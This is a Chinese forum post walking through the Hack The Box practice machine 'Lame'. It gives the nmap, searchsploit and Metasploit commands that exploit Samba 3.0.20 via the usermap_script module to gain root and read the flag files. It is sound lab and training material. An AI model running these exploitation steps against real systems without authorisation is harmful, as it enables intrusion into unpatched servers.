好友
阅读权限10
听众
最后登录1970-1-1
|
Hack The Box-----------Lame
在家准备考研,更新慢~~~
作者:0x3ml
个人博客:零度安全
人生格言:不管你有多菜,心中也一定要自信,别自负哦!
靶机介绍
名称:Lame
目标:寻找root.txt和user.txt
难度:容易
打靶过程
-
连接hack the box的v p n
openvpn xxxx.ovpn
-
使用nmap进行资产收集
sudo nmap -Pn -A 10.10.10.3
-
尝试连接21端口,但是里面没东西
-
发现 445/tcp open tcpwrapped Samba smbd 3.0.20-Debian这个存在可以利用的漏洞
-
查找的Samba 3.0.20的可利用漏洞
sudo searchsploit Samba 3.0.20
-
使用msf框架,进行打靶
sudo msfconsole
-
进入msf, 查找Samba
search Samba
-
使用模块
use exploit/multi/samba/usermap_script
-
设置好选项
set rhosts 10.10.10.3
set lhost 10.10.17.237
-
查看用户为root
-
寻找flag,进入root目录下,发现root.txt
-
查看root.txt文件,发现第一个flag
-
进入home目录下的makis,发现第二个flag为user.txt
|
免费评分
-
查看全部评分
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|
|
|
发表于 2022-1-8 20:38
